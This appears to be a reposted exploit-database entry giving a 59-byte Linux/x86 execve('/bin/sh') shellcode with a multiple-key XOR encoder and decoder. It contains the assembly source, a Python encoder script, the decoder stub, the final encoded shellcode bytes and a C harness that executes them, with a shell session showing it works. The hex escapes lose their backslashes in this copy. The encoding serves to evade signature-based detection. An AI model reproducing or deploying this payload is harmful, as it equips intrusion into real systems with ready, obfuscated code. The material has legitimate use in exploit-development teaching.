Exploit/Advisories

Published on May 11th, 2019 📆 | 7392 Views ⚑

0

Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)


https://www.ispeech.org/text.to.speech

# Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
# Author: Xavi Beltran
# Date: 05/05/2019
# Contact: xavibeltran@protonmail.com
# Purpose: spawn /bin/sh shell
# Tested On: Ubuntu 3.5.0-17-generic
# Arch: x86
# Size: 59 bytes

############################################## sh.nasm ###############################################
global _start			
section .text
_start:
	xor eax, eax
	push eax
	push 0x68732f2f
	push 0x6e69622f
	mov ebx, esp
	push eax
	mov edx, esp
	push ebx
	mov ecx, esp
	mov al, 11
	int 0x80


###################################### original shellcode #############################################
x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80


#################################  encoder-xor-multiple-keys.py  ######################################
#!/usr/bin/python
# Autor: Xavi Beltran
# Date: 05/05/2019

shellcode = ("x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

i = 1
for x in bytearray(shellcode) :

	if  i == 11:
		i = 1
	y = x^i
	encoded += 'x'
	encoded += '%02x' % y

	encoded2 += '0x'
	encoded2 += '%02x,' %y
	
	i = i + 0x01

print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))


######################################### Encoded Shellcode  ###############################################

socket@ubuntu:~/Assesments/4$ python encoder-xor-multiple-keys.py 
Encoded shellcode ...
x30xc2x53x6cx2ax29x74x60x61x25x63x6bx6dx8dxe6x56x8exeax5ax83xe0xb2x08xc9x85
0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85,
Len: 25


#################################### decoder-xor-multiple-keys.nasm  ###############################################

; Filename: xor-decoder-multiple-keys.nasm
; Author:  Xavi Beltran
; Date: 05/05/2019

global _start			

section .text
_start:

	xor edx, edx
	mov dl, 1
	jmp short call_decoder

decoder:
	pop esi
	xor ecx, ecx
	mov cl, 25


decode:
	cmp dl, 0x0b
	jz xor_counter
	xor byte [esi], dl
	inc esi
	inc dl
	loop decode

	jmp short Shellcode

xor_counter:
	mov dl, 1
	jmp decode

call_decoder:

	call decoder
	Shellcode: db 0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85


############################################### final shellcode ################################################

socket@ubuntu:~/Assesments/4$ ./objdump_parser.sh decoder-xor-multiple-keys
"x31xd2xb2x01xebx17x5ex31xc9xb1x19x80xfax0bx74x09x30x16x46xfexc2xe2xf4xebx09xb2x01xebxeexe8xe4xffxffxffx30xc2x53x6cx2ax29x74x60x61x25x63x6bx6dx8dxe6x56x8exeax5ax83xe0xb2x08xc9x85"
socket@ubuntu:~/Assesments/4$ ./shellcode 
Shellcode Length:  59
$ whoami
socket

socket@ubuntu:~/Assesments/4$ cat shellcode.c 
#include
#include

unsigned char code[] = 
"x31xd2xb2x01xebx17x5ex31xc9xb1x19x80xfax0bx74x09x30x16x46xfexc2xe2xf4xebx09xb2x01xebxeexe8xe4xffxffxffx30xc2x53x6cx2ax29x74x60x61x25x63x6bx6dx8dxe6x56x8exeax5ax83xe0xb2x08xc9x85";

main()
{

	printf("Shellcode Length:  %dn", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}





https://www.exploit-db.com/exploits/46800

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑